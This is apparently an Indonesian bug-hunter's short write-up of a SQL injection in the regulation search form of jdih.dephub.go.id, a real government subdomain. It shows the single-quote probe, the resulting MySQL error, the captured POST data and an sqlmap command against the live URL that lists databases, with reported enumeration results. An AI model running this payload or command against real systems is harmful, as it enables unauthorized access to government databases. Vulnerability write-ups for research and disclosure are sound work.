Halo :D Kembali lagi bersama saya :D Kali ini saya ingin menjelaskan bagaimana saya bisa menemukan BUG SQL Injection pada Subdomain dephub.go.id ? Let’s go!
Ketika saya mencoba untuk mencari point inject nya, saya berpikir untuk mencari di kolom pencarian peraturan. Maka saya memasukkan input single quote (‘) pada kolom pencarian peraturan. Dan respons nya setelah saya input adalah
Respons
“ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘%’ OR title like ‘%’%’ ) AND `state` IS NOT NULL ORDER BY `created` desc’ at line 3 “
Sesudah Saya mendapatkan pesan error setelah memasukkan single quote (‘), lanjut Saya mencari post datanya menggunakan Live Http Header di Mozilla Firefox atau ke inspect element lalu ke bagian network. Berikut Post Data yang sudah Saya dapatkan
Post Data: s=’&jenis_peraturan=0&nomor=&tahun=0
Selanjutnya saya Melakukan Scan di SQL Map Dengan Command
sqlmap.py -u “http://jdih.dephub.go.id/pencarian” — data=”s=’&jenis_peraturan=0&nomor=&tahun=0” — dbs
Hasil dari scannya adalah
available databases [70] database management system users [14]
Oke itu saja write up sederhana dari saya, Terima kasih sudah membaca write up saya ini. Jangan lupa share yaa, agar saya semangat untuk memberikan write up lagi :D
Contact me at buayalaut.dev